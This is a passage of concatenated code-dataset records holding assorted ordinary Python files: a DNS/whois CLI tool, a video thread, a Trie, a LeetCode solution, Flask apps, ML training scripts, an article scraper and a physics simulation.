str(dns.resolver.resolve(rev_name, \"PTR\")[0])\n except:\n pass\n print(\"The A record of %s is %s and its PTR is %s\" % (rdata.exchange, MxIp, reversed_dns1))\n except Exception as e:\n print(e)\n\n\n@click.command()\n@click.option('--domain', required=True, help='domain name to query')\n@click.option('--who', is_flag=True, help='whois data only')\n@click.option('--ns', help='IP of ns server')\ndef domain_info(domain, who, ns):\n \"\"\" Simple Whois + Dig Cli Tool \"\"\"\n if who:\n Whois_Head = colored('Whois Information:', 'red')\n click.echo(Whois_Head)\n whois(domain)\n elif ns:\n dominfo(domain, ns, 'A')\n dominfo(domain, ns, 'MX')\n dominfo(domain, ns, 'TXT')\n else:\n Whois_Head = colored('Whois Information:', 'red')\n click.echo(Whois_Head)\n whois(domain)\n GHeadLine = colored('Google DNS Information:', 'red')\n click.echo(GHeadLine)\n dominfo(domain, '8.8.8.8', 'A')\n dominfo(domain, '8.8.8.8', 'MX')\n dominfo(domain, '8.8.8.8', 'TXT')\n DHeadLine = colored('Interspace DNS Information:', 'red')\n click.echo(DHeadLine)\n dominfo(domain, '80.244.161.84', 'A')\n dominfo(domain, '80.244.160.50', 'A')\n dominfo(domain, '80.244.161.84', 'MX')\n dominfo(domain, '80.244.160.50', 'MX')\n dominfo(domain, '80.244.161.84', 'TXT')\n dominfo(domain, '80.244.160.50', 'TXT')\n\n\nif __name__ == '__main__':\n domain_info()\n","sub_path":"domain_info.py","file_name":"domain_info.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"627997827","text":"#OpenCv\nimport cv2\nimport time\n#QT thread\nfrom PyQt4.QtCore import QThread\nfrom PyQt4.QtCore import SIGNAL\nfrom PyQt4 import QtGui\nclass VideoModel(QThread):\n fps = 1\n def __init__(self, filename):\n super(VideoModel, self).__init__()\n self.filename = filename\n\n\n def run(self):\n print ('Start')\n cap = cv2.VideoCapture(self.filename)\n\n imageWidth = 640\n imageHeight = 480\n\n while cap.isOpened():\n\n _, frame = cap.read()\n if frame is not None:\n resizedFrame = cv2.resize(frame, (imageWidth, imageHeight))\n\n img = QtGui.QImage(resizedFrame, imageWidth, imageHeight, QtGui.QImage.Format_RGB888).rgbSwapped()\n time.sleep(0.025)\n self.emit(SIGNAL('newImage(QImage)'), img)\n\n cap.release()\n cv2.destroyAllWindows()","sub_path":"Model/VideoModel.py","file_name":"VideoModel.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"473402935","text":"# Given string S and a dictionary of words words, find the number of words[i] that is a subsequence of S.\n# Example :\n# Input:\n# S = \"abcde\"\n# words = [\"a\", \"bb\", \"acd\", \"ace\"]\n# Output: 3\n# Explanation: There are three words in words that are a subsequence of S: \"a\", \"acd\", \"ace\".\nimport sys\n\n\ndef numMatchingSubseq(S, words):\n count = 0\n for w in words:\n if checkSubseq(S, w):\n count += 1\n return count\n\ndef checkSubseq(S, word):\n \"\"\"\n This should be solved by indexing or BS\n abcde\n f\n cw\n s\n \"\"\"\n fast,slow = 0,0\n\n while fast < len(S) and slow < len(word):\n if S[fast] == word[slow]:\n slow += 1\n fast += 1\n\n if slow == len(word):\n return True\n else:\n return False\n\nif __name__ == '__main__':\n print(numMatchingSubseq(\"abcde\", [\"a\", \"bb\", \"acd\", \"ace\"]))\n","sub_path":"Leetcode/Number of Matching Subsequences.py","file_name":"Number of Matching Subsequences.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"393608276","text":"#!/usr/bin/env python\n#\n# Copyright 2014 The BCE Authors. All rights reserved.\n# Use of this source code is governed by a BSD-style license that can be\n# found in the license.txt file.\n#\n\nimport bce_portal.packages.ketcher.parser.molecule as _mol_parser\nimport bce_portal.packages.ketcher.parser.error as _err\n\n\ndef _raise_program(msg=\"\"):\n \"\"\"Raise a program error (indicated that we meet a program caused by developers).\n\n :param msg: The error message.\n :raise _err.ProgramError: (Always).\n \"\"\"\n\n raise _err.ProgramError(msg)\n\n\ndef parse_reaction(reaction_dict):\n \"\"\"Parse a reaction dictionary.\n\n :param reaction_dict: The reaction dictionary.\n :rtype : dict\n :return: A dictionary contains the BCE expression of reactants(key='reactants') and products(key='products').\n \"\"\"\n\n # Check dictionary type.\n if not (\"type\" in reaction_dict) or reaction_dict[\"type\"] != \"reaction\":\n _raise_program()\n\n # Check reactants and products count.\n if (not (\"reactant_count\" in reaction_dict)) or (not (\"product_count\" in reaction_dict)):\n _raise_program()\n\n # Get reactants count and products count.\n reactant_count = reaction_dict[\"reactant_count\"]\n product_count = reaction_dict[\"product_count\"]\n\n # Check data type.\n if (not isinstance(reactant_count, int)) or (not isinstance(product_count, int)):\n _raise_program()\n\n # Initialize an empty reactants list.\n reactants = []\n\n for reactant_id in range(0, reactant_count):\n # Get current reactant.\n reactant_section = \"reactant_\" + str(reactant_id + 1)\n\n if not (reactant_section in reaction_dict):\n print(reactant_section)\n _raise_program()\n\n reactant_data = reaction_dict[reactant_section]\n\n # Check data type.\n if not isinstance(reactant_data, dict):\n _raise_program()\n\n # Build BCE expression and append it.\n reactants.append(_mol_parser.build_molecule_expression(_mol_parser.parse_molecule(reactant_data)))\n\n # Initialize an empty products list.\n products = []\n\n for product_id in range(0, product_count):\n # Get current product.\n product_section = \"product_\" + str(product_id + 1)\n\n if not (product_section in reaction_dict):\n _raise_program()\n\n product_data = reaction_dict[product_section]\n\n # Check data type.\n if not isinstance(product_data, dict):\n _raise_program()\n\n # Build BCE expression and append it.\n products.append(_mol_parser.build_molecule_expression(_mol_parser.parse_molecule(product_data)))\n\n return {\n \"reactants\": reactants,\n \"products\": products,\n }\n\n\ndef build_reaction_expression(parsed_reaction):\n \"\"\"Build reaction expression in BCE acceptable form.\n\n :rtype : str\n :param parsed_reaction: The parsed reaction.\n :return: The expression.\n \"\"\"\n\n # Get reactants and products.\n reactants = parsed_reaction[\"reactants\"]\n products = parsed_reaction[\"products\"]\n\n # Check data count.\n if len(reactants) == 0 or len(products) == 0:\n _raise_program()\n\n # Initialize an empty expression.\n ret = \"\"\n\n # Iterate all reactants.\n for idx in range(0, len(reactants)):\n # Append the expression.\n ret += reactants[idx]\n # Append the '+' (or '=' after the last reactant).\n if idx != len(reactants) - 1:\n ret += \"+\"\n else:\n ret += \"=\"\n\n # Iterate all products.\n for idx in range(0, len(products)):\n # Append the expression.\n ret += products[idx]\n\n # Append the '+'.\n if idx != len(products) - 1:\n ret += \"+\"\n\n return ret","sub_path":"bce_portal/packages/ketcher/parser/reaction.py","file_name":"reaction.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"549385425","text":"# -*- coding: UTF-8 -*-\n#创建掩码式NumPy数组\nimport numpy\nimport scipy.misc\nimport matplotlib.pyplot as plt \n\nface = scipy.misc.face()\nrandom_mask = numpy.random.randint(0, 2, size=face.shape)\n\nplt.subplot(221)\nplt.title(\"Original\")\nplt.imshow(face)\nplt.axis(\"off\")\n\nmasked_array = numpy.ma.array(face, mask=random_mask)\n\nplt.subplot(222)\nplt.title(\"Masked\")\nplt.imshow(masked_array)\nplt.axis(\"off\")\n\nplt.subplot(223)\nplt.title(\"Log\")\nplt.imshow(numpy.ma.log(face).astype(\"float32\"))\nplt.axis(\"off\")\n\nplt.subplot(224)\nplt.title(\"Log Masked\")\nplt.imshow(numpy.ma.log(masked_array).astype(\"float32\"))\nplt.axis(\"off\")\n\nplt.show()","sub_path":"python/Learn/Course/PythonDataAnalysis/Chapter4/test4.5.py","file_name":"test4.5.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"43297773","text":"\nclass TrieNode():\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.nodes = collections.defaultdict(TrieNode) # Easy to insert new node.\n self.isword = False \n\nclass Trie:\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.root = TrieNode()\n \n\n def insert(self, word):\n \"\"\"\n Inserts a word into the trie.\n :type word: str\n :rtype: void\n \"\"\"\n curr = self.root\n for c in word:\n curr = curr.nodes[c]\n curr.isword = True\n\n def search(self, word):\n \"\"\"\n Returns if the word is in the trie.\n :type word: str\n :rtype: bool\n \"\"\"\n curr = self.root\n for c in word:\n if c not in curr.nodes: return False\n curr = curr.nodes[c]\n return curr.isword\n\n def startsWith(self, prefix):\n \"\"\"\n Returns if there is any word in the trie that starts with the given prefix.\n :type prefix: str\n :rtype: bool\n \"\"\"\n curr = self.root\n for c in prefix:\n if c not in curr.nodes:\n return False\n curr = curr.nodes[c]\n return True\n \n\n\n# Your Trie object will be instantiated and called as such:\n# obj = Trie()\n# obj.insert(word)\n# param_2 = obj.search(word)\n# param_3 = obj.startsWith(prefix)\n","sub_path":"Implement Trie (Prefix Tree).py","file_name":"Implement Trie (Prefix Tree).py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"123095959","text":"#D:\\Projects\\PythonWorkspace\\TripressoCrawler\\DBSchema\\ExecSQL.py\n#執行測試用的指令\n\nimport sqlite3\nconn = sqlite3.connect('test.db')\nprint('Database connection openned!')\ncur = conn.cursor()\n\n\nsql = ''\n# sql = 'delete from TourInfo '\n# sql = 'drop table TourInfo'\n# sql='''insert into TourInfo (travel_agent, tour_id, tour_name, leave_date, \n# days, unfilled_places, total_places, fee) values (?, ?, ?, ?, ?, ?, ?, ?)'''\n# sql = ''' CREATE TABLE IF NOT EXISTS TourInfo (\n# travel_agent text not null,\n# tour_id text not null,\n# tour_name text NOT NULL,\n# leave_date text NOT NULL, \n# days integer NOT NULL, \n# unfilled_places integer NOT NULL,\n# total_places integer NOT NULL,\n# fee integer NOT NULL,\n# PRIMARY KEY (travel_agent, tour_id)\n# ); '''\n\n\n\nif 'insert' in sql:\n values=('Gloria', 'SELA5OZ8914C' , \\\n '【花漾韓國】∼入住首爾市區飯店+升等五花飯店∼韓服體驗、愛寶樂園、冰雪樂園、光明洞窟、拌飯秀5天', \\\n '2018/09/14', 5, 0, 20, 14500)\n cur.execute(sql,values)\nelse:\n cur.execute(sql)\n\nconn.commit()\nprint('SQL Committed:' + sql)\nconn.close()\nprint('Database connection closed!')","sub_path":"DBSchema/ExecSQL.py","file_name":"ExecSQL.py","file_ext":"py","file_size_in_byte":1590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"222956348","text":"__author__ = 'wilrona'\n\nfrom google.appengine.ext import ndb\nfrom ..travel.models_travel import TravelModel\nfrom ..vessel.models_vessel import VesselModel\n\n\nclass DepartureModel(ndb.Model):\n departure_date = ndb.DateProperty()\n schedule = ndb.TimeProperty()\n time_delay = ndb.TimeProperty()\n destination = ndb.KeyProperty(kind=TravelModel)\n vessel = ndb.KeyProperty(kind=VesselModel)\n date_update = ndb.DateProperty(auto_now=True)\n\n def make_to_dict(self):\n to_dict = {}\n to_dict['departure_id'] = self.key.id()\n to_dict['departure_date'] = str(self.departure_date)\n to_dict['departure_schedule'] = str(self.schedule)\n if self.time_delay:\n to_dict['departure_delay'] = str(self.time_delay)\n to_dict['delay'] = True\n else:\n to_dict['delay'] = False\n to_dict['departure_destination'] = self.destination.id()\n to_dict['departure_vessel'] = self.vessel.id()\n return to_dict\n\n def reserved(self):\n from ..ticket.models_ticket import TicketModel\n\n reserved_count = TicketModel.query(\n TicketModel.departure == self.key,\n TicketModel.travel_ticket == self.destination\n ).count()\n\n reserved = False\n if reserved_count >= 1:\n reserved = True\n\n return reserved\n","sub_path":"application/modules/departure/models_departure.py","file_name":"models_departure.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"40383885","text":"from flask import Flask, render_template, jsonify\n\n\napp = Flask(__name__)\n\n\n@app.route('/')\ndef home():\n 'Show the homepage'\n return render_template('home.html'), 200\n\n\n@app.route('/endpoint', methods=['GET'])\ndef endpoint():\n 'Any custom endpoint - useful when creating APIs'\n\n return jsonify({\"result\": \"This just works!\"}), 200\n\n\napp.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"521510319","text":"import cv2 as cv\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport utils\n\ndef find_matches(des1, des2, thresh=0.8):\n a2 = (des1**2).sum(axis=1)\n b2 = (des2**2).sum(axis=1)\n ab = np.dot(des2, des1.T)\n norm = (a2[np.newaxis, :] -2*ab + b2[:, np.newaxis]).T\n best = norm.argsort(axis=1)[:, :2]\n for kp in range(des1.shape[0]):\n if norm[kp, best[kp,0]] / norm[kp, best[kp,1]] < thresh:\n yield (kp, best[kp, 0])\n\ndef detect_keypoints(I):\n sift = cv.xfeatures2d.SIFT_create()\n kp, des = sift.detectAndCompute(I, None)\n return kp, des \n\ndef pipeline(vid='dataset/trimmed/6032627733001_Trim.mp4'):\n prev = None\n i = 0\n for idx, frame in utils.video(vid):\n if prev is not None:\n if (i % 3) != 0: continue\n tup1 = detect_keypoints(frame)\n tup2 = detect_keypoints(prev)\n img2 = frame.copy()\n for kp1, kp2 in find_matches(tup1[1], tup2[1], 0.5):\n x1,y1 = tup1[0][kp1].pt\n x2,y2 = tup2[0][kp2].pt\n manhattan = abs(x1-x2) + abs(y1-y2)\n if manhattan > 5:\n cv.circle(img2, (int(x1), int(y1)), 2, (255, 0, 0), -1)\n cv.circle(img2, (int(x2), int(y2)), 2, (0, 0, 255), -1)\n yield img2\n prev = frame\n\nutils.writer(pipeline(), 'sift.mp4')","sub_path":"detection/classical/sift.py","file_name":"sift.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"569637071","text":"import preproc.get_data as data\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\nimport numpy as np\nimport glob\nimport datetime\n\nfrom metrics.f1 import f1\nfrom metrics.f1 import f1_binary\n\nfrom sklearn.model_selection import train_test_split\n\nimport tensorflow as tf\nfrom tensorflow.keras.callbacks import EarlyStopping, ModelCheckpoint\nimport os\n\nfrom models import unet2 as unet\nfrom submission import model_to_submission as submission\n\n\n\ndef train_sub(model, model_name, x, y, validation_data, epochs=100, batch_size=8, verbose=2):\n tf.compat.v1.reset_default_graph()\n tf.random.set_seed(42424242)\n tf.compat.v1.set_random_seed(42424242)\n\n print('\\n\\n\\nMODEL:' + model_name)\n earlystopper = EarlyStopping(patience=13, verbose=2)\n model_path_name = 'checkpoints/ckp_{}.h5'.format(model_name)\n checkpointer = ModelCheckpoint(model_path_name, verbose=1, save_best_only=True)\n\n os.makedirs(\"tf_logs\", exist_ok = True)\n log_dir = \"tf_logs/\" + model_name + \"_\" + datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\n tensorboard_callback = tf.keras.callbacks.TensorBoard(log_dir=log_dir, histogram_freq=1)\n\n history = model.fit(x, y, validation_data=validation_data,\n batch_size=batch_size, epochs=epochs,\n callbacks=[earlystopper, checkpointer, tensorboard_callback],\n verbose=verbose)\n\n model.load_weights(model_path_name)\n submission.create_with_split(model, model_name)\n\n\n\ndef main():\n x1, y1 = data.get_training_data()\n x2, y2 = data.get_training_data2()\n\n print('x1, y1',x1.shape, y1.shape)\n x1_train, x_test, y1_train, y_test = train_test_split(x1, y1, test_size=0.3, random_state=42424242)\n\n\n print('x1_train, x2', x1_train.shape, x2.shape, x1_train.dtype, x2.dtype)\n x = np.concatenate((x1_train, x2), axis=0)\n print(y1_train.shape, y2.shape)\n y = np.concatenate((y1_train, y2), axis=0)\n\n #x, y = data.augment_data(x, y)\n\n # x, y = data.augment_data(x,y)\n\n\n # crossentropy\n model = unet.get_model(400, 400, 3, do_compile=False)\n model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy', tf.keras.metrics.MeanIoU(num_classes=2), f1, f1_binary])\n model_name = 'u_net2_crossentropy_EXTDATA_FS_1'\n \n train_sub(model, model_name, x, y, (x_test, y_test), epochs=100)\n\n\n\n # dice\n from losses import dice\n loss = dice.dice_loss\n\n model_name = 'u_net_dice'\n model = unet.get_model(400, 400, 3, do_compile=False)\n model.compile(optimizer='adam', loss=loss, metrics=['accuracy', tf.keras.metrics.MeanIoU(num_classes=2), f1, f1_binary])\n model_name = 'u_net2_dice_EXTDATA_FS_1'\n \n train_sub(model, model_name, x, y, (x_test, y_test), epochs=100)\n\n\n\n # u_net_focal\n from losses import focal\n loss = focal.focal_loss\n model = unet.get_model(400, 400, 3, do_compile=False)\n model.compile(optimizer='adam', loss=loss, metrics=['accuracy', tf.keras.metrics.MeanIoU(num_classes=2), f1, f1_binary])\n model_name = 'u_net2_focal_EXTDATA_FS_1'\n \n train_sub(model, model_name, x, y, (x_test, y_test), epochs=100)\n\n\n\n # lovasz\n from losses import lovasz\n loss = lovasz.lovasz_loss\n model = unet.get_model(400, 400, 3, do_compile=False)\n model.compile(optimizer='adam', loss=loss, metrics=['accuracy', tf.keras.metrics.MeanIoU(num_classes=2), f1, f1_binary])\n model_name = 'u_net2_lovasz_EXTDATA_FS_1'\n\n train_sub(model, model_name, x, y, (x_test, y_test), epochs=100)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"train_for_submission.py","file_name":"train_for_submission.py","file_ext":"py","file_size_in_byte":3549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"651367032","text":"import torch\nimport numpy as np\n\nfrom flask import Flask\nfrom flask import render_template\nfrom flask import request\n\nfrom trainer import load_embeddings\nfrom lib.tokenizer import preprocessor\nfrom lib.config import MODEL_EC, DEVICE\nfrom lib.data_utils import vectorize\nfrom lib.utils import load_movies, load_music\n\napp = Flask(__name__)\napp._static_folder = './static'\n\nlabels = ['Anger', 'Anticipation', 'Disgust', 'Fear', 'Joy', 'Love', 'Optimism', 'Pessimism', 'Sadness', 'Surprise', 'Trust', 'Neutral']\nrecommend_id = [1, 4, 2, 3, 4, 4, 4, 3, 5, 6, 4, 4]\nmodel_path = '/home/houyu/learning/FinalProject/out/model/EmotionClassification_0.5900_2019-05-06_00:51.model'\nmovie_path = '/home/houyu/learning/FinalProject/database/MovieData.csv'\nmusic_path = '/home/houyu/learning/FinalProject/database/MusicData.csv'\nmodel_conf = MODEL_EC\nmax_length = 85 # 85 train 65 dev 58 test\n\n# 1 1 0 0 0 0 1 0 0 0 1\n# test_sentence = '@Adnan__786__ @AsYouNotWish Dont worry Indian army is on its ways to dispatch all Terrorists to Hell'\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/response', methods=['post'])\ndef response():\n print(\"RESPONSE ...\")\n\n # Loading model\n model = torch.load(model_path)\n model.eval()\n\n # Pre-processing inputs\n input_text = request.form.get('message')\n print(input_text)\n input_text = input_text.strip()\n if input_text == '':\n print(\"Oops! You input nothing!\")\n emotions = ['NONE']\n movies = [['NONE']]\n songs = [['NONE']]\n return render_template('response.html', emotions=emotions, movies=movies, songs=songs)\n else:\n pro_sent = preprocessor(input_text)\n\n # Embedding and vectorize\n word2idx, _, embeddings = load_embeddings(model_conf)\n sample = vectorize(pro_sent, word2idx, max_length)\n\n # Processing to get model inputs\n samples = []\n lengths = []\n samples.append(sample)\n lengths.append(len(pro_sent))\n\n # tensor([17, 4, 37, 42, 21, 16, 13, 44, 29, 10, 15, 22, 21, 23, 18, 23, 25, 10,\n # 23, 9, 22, 18, 14, 15, 6, 33, 14, 30, 13, 22, 26, 17],\n # device='cuda:0')\n # torch.ones([2, 4], dtype=torch.float64, device=cuda0)\n samples = np.asarray(samples)\n lengths = np.asarray(lengths)\n\n samples = torch.tensor(samples)\n lengths = torch.tensor(lengths)\n\n samples = samples.to(DEVICE)\n lengths = lengths.to(DEVICE)\n\n\n # Running model\n outputs, attentions = model(samples, lengths)\n\n # print(attentions)\n\n # tensor([ 2.1146, -1.7304, 2.0117, -1.3296, -3.1048, -5.9759, -2.7536, -2.7494, print(outputs)\n # -1.8445, -4.1412, -4.7449], device='cuda:0', grad_fn=)\n # tensor([0.0521, 0.0631, 0.0632, 0.0632, 0.0632, 0.0632, 0.0631, 0.0632, 0.0632, print(attentions)\n # 0.0632, 0.0631, 0.0632, 0.0632, 0.0632, 0.0632, 0.0632],\n # device='cuda:0', grad_fn=)\n # gold: 1 1 0 0 0 0 1 0 0 0 1\n # [ 2.11464429 -1.7303592 2.01172185 -1.32956982 -3.10483193 -5.97593689 print(posts)\n # -2.75357819 -2.74935317 -1.84453487 -4.14115143 -4.74489594]\n posts = outputs.data.cpu().numpy()\n predicted = np.clip(np.sign(posts), a_min=0, a_max=None) # 1 1 0 0 0 0 1 0 0 0 1\n predicted = predicted.astype(np.int32)\n\n emotions = []\n ids = set()\n sum_item = 0\n for idx, item in enumerate(predicted):\n if item == 1:\n emotions.append(labels[idx])\n ids.add(recommend_id[idx])\n sum_item += item\n if sum_item == 0:\n emotions.append(labels[11]) # neutral\n ids.add(recommend_id[11])\n\n if len(emotions) > 6:\n print(\"Hey, there are more than 6 predicted emotions. Below are original emotions and emotions for displaying.\")\n print(emotions)\n emotions = emotions[:6]\n print(emotions)\n else:\n print(emotions)\n\n print(ids)\n\n # movies and music matching\n all_movies = load_movies(movie_path)\n all_music = load_music(music_path)\n movies = []\n songs = []\n for i in ids:\n for m in all_movies[i]:\n movies.append(m)\n for s in all_music[i]:\n songs.append(s)\n\n print(songs)\n print(movies)\n\n if len(movies) > 3:\n random_int = set()\n while len(random_int) < 3:\n index = np.random.randint(low=0, high=len(movies))\n random_int.add(index)\n new_movies = []\n for i in random_int:\n new_movies.append(movies[i])\n movies = new_movies\n print(movies)\n if len(songs) > 6:\n random_int = set()\n while len(random_int) < 6:\n index = np.random.randint(low=0, high=len(songs))\n random_int.add(index)\n # indexs = np.random.randint(low=0, high=len(songs), size=6)\n new_songs = []\n for i in random_int:\n new_songs.append(songs[i])\n songs = new_songs\n print(songs)\n\n\n return render_template('response.html', emotions=emotions, movies=movies, songs=songs)\n\n\ndef main():\n print(\"Starting...\")\n\n app.run(host='0.0.0.0', debug=False)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":5553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"646730442","text":"from newspaper import Article\nimport csv\nimport tldextract\n\n# Metadata:\n\n# twitter account, stock, url, source, title, authors, \n# publish_date, text, and keywords.\n\n# Diverse News Sources for Testing:\n\n# CNN, Yahoo Finance, Wall Street Journal, Bloomberg, CNBC, Reuters, \n# Marketwatch, Financial times, Kiplinger, Motley Fool, Invester Times Daily, \n\n# function that takes in url parameter and saves metadata to csv file\ndef getArticleMetadata(url):\n article_info_dict = {}\n article = Article(url)\n article.download()\n article.parse()\n # extracts domain name from the news source URL\n extracted_url = tldextract.extract(url)\n # saves data to a dictionary\n article_info_dict['url'] = url\n article_info_dict['source'] = extracted_url.domain\n article_info_dict['title'] = article.title\n article_info_dict['authors'] = article.authors\n article_info_dict['publish_date'] = article.publish_date\n print()\n print(article_info_dict)\n \n # saves dictionary to csv file\n with open('metadata.csv', 'a', newline='') as csv_file:\n fieldnames = ['twitter_account', 'stock', 'url', 'source', 'title', 'authors', 'publish_date', 'text', 'keywords']\n writer = csv.DictWriter(csv_file, fieldnames=fieldnames)\n writer.writerow(article_info_dict)\n\n# Testing One URL\nurl = 'https://www.cnn.com/2020/03/16/tech/amazon-shipping-coronavirus/index.html'\ngetArticleMetadata(url)\n\n# Testing Multiple URLs\n# url_list = ['https://www.cnn.com/2020/03/16/tech/amazon-shipping-coronavirus/index.html',\n# 'https://finance.yahoo.com/news/apocalyptic-scenario-unlikely-amazon-other-tech-stocks-tech-analyst-says-194143166.html',\n# 'https://www.wsj.com/articles/coronavirus-sparks-hiring-spree-for-nearly-500-000-jobs-at-biggest-retailers-11584984596',\n# 'https://www.bloomberg.com/opinion/articles/2020-04-01/apple-deal-with-amazon-prime-video-is-game-changer',\n# 'https://www.cnbc.com/2020/03/29/amazon-workers-in-staten-island-plan-strike-over-coronavirus-safety.html',\n# 'https://www.reuters.com/article/us-health-coronavirus-amazon-com-masks-e/exclusive-amazon-to-deploy-masks-and-temperature-checks-for-workers-by-next-week-idUSKBN21K1Y6',\n# 'https://www.marketwatch.com/story/as-coronavirus-hits-hard-amazon-starts-licensing-cashier-free-technology-to-retailers-2020-03-31',\n# 'https://www.ft.com/content/220bf850-726c-11ea-ad98-044200cb277f',\n# 'https://www.kiplinger.com/slideshow/investing/T018-S001-the-9-best-dow-jones-dividend-growth-stocks/index.html',\n# 'https://www.fool.com/investing/2020/04/02/india-coronavirus-lockdown-mean-amazon-walmart.aspx',\n# 'https://www.investors.com/research/how-to-find-the-best-stocks-to-buy/amazon-stock-aws-cloud-services-drive-coronavirus-stock-market/'\n# ]\n\n# for url in url_list:\n# getArticleMetadata(url)\n\n","sub_path":"code/articlescraper.py","file_name":"articlescraper.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"448752734","text":"# encoding: utf-8\n\"\"\"\nUtilities for testing.\n\"\"\"\nfrom __future__ import unicode_literals\nfrom contextlib import contextmanager\n\nfrom tornado.web import HTTPError\n\n\n@contextmanager\ndef assertRaisesHTTPError(testcase, status, msg=None):\n msg = msg or \"Should have raised HTTPError(%i)\" % status\n try:\n yield\n except HTTPError as e:\n testcase.assertEqual(e.status_code, status)\n else:\n testcase.fail(msg)\n","sub_path":"hybridcontents/tests/testing_utils.py","file_name":"testing_utils.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"80284280","text":"\"\"\"Provide socketio event handlers.\"\"\"\nfrom imjoy.utils import get_psutil\n\nfrom .decorator import socketio_handler as sio_on\n\nNAME_SPACE = \"/\"\n\n\ndef register_services(engine, register_event_handler):\n \"\"\"Register services running by the engine.\"\"\"\n # basic engine service\n register_event_handler(engine, connect)\n register_event_handler(engine, disconnect)\n register_event_handler(engine, reset_engine)\n register_event_handler(engine, on_get_engine_status)\n\n\n@sio_on(\"connect\")\ndef connect(engine, sid, _):\n \"\"\"Connect client.\"\"\"\n logger = engine.logger\n logger.info(\"Connect %s\", sid)\n\n\n@sio_on(\"reset_engine\")\nasync def reset_engine(engine, sid, kwargs):\n \"\"\"Reset engine.\"\"\"\n logger = engine.logger\n registered_sessions = engine.store.registered_sessions\n if sid not in registered_sessions:\n logger.debug(\"Client %s is not registered\", sid)\n return {\"success\": False, \"error\": \"client has not been registered\"}\n\n # services and runners can register reset_engine_* handlers that will be called here\n for event, handler in engine.conn.sio.handlers[NAME_SPACE].items():\n if not event.startswith(\"reset_engine_\"):\n continue\n await handler(sid, kwargs)\n\n engine.conn.reset_store(reset_clients=False)\n\n return {\"success\": True}\n\n\n@sio_on(\"get_engine_status\")\nasync def on_get_engine_status(engine, sid, _):\n \"\"\"Return engine status.\"\"\"\n logger = engine.logger\n plugins = engine.store.plugins\n registered_sessions = engine.store.registered_sessions\n if sid not in registered_sessions:\n logger.debug(\"Client %s is not registered\", sid)\n return {\"success\": False, \"error\": \"client has not been registered.\"}\n psutil = get_psutil()\n if psutil is None:\n return {\"success\": False, \"error\": \"psutil is not available.\"}\n current_process = psutil.Process()\n children = current_process.children(recursive=True)\n pid_dict = {}\n for plugin in plugins.values():\n if plugin[\"process_id\"] is not None:\n pid_dict[plugin[\"process_id\"]] = plugin\n\n procs = []\n for proc in children:\n if proc.is_running() and proc.status() != psutil.STATUS_ZOMBIE:\n if proc.pid in pid_dict:\n procs.append({\"name\": pid_dict[proc.pid][\"name\"], \"pid\": proc.pid})\n else:\n procs.append({\"name\": proc.name(), \"pid\": proc.pid})\n\n return {\n \"success\": True,\n \"plugin_num\": len(plugins),\n \"plugin_processes\": procs,\n \"engine_process\": current_process.pid,\n }\n\n\n@sio_on(\"disconnect\")\nasync def disconnect(engine, sid):\n \"\"\"Disconnect client.\"\"\"\n logger = engine.logger\n # services and runners can register disconnect_* handlers that will be called here\n for event, handler in engine.conn.sio.handlers[NAME_SPACE].items():\n if not event.startswith(\"disconnect_\"):\n continue\n await handler(sid)\n logger.info(\"Client(%s) disconnected\", sid)\n","sub_path":"imjoy/connection/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"423615500","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 1 13:26:48 2019\n\n@author: ykang\n\"\"\"\n\nimport numpy as np\nimport kwant\nfrom kwant.digest import uniform\n#from matplotlib import pyplot\n\nlat = kwant.lattice.chain()\ndef make_system(length,dis,salt):\n def onsite(site):\n return dis*(uniform(repr(site),salt)-.5)+4 +0.2j\n syst = kwant.Builder()\n syst[(lat(x) for x in range(length))] = onsite\n syst[lat.neighbors()] = -1\n\n lead = kwant.Builder(kwant.TranslationalSymmetry([-1]))\n lead[(lat(0))] = 4\n lead[lat.neighbors()] = -1\n\n syst.attach_lead(lead)\n syst.attach_lead(lead.reversed())\n return syst\n\n\ndef mount_vlead(sys, vlead_interface, norb):\n 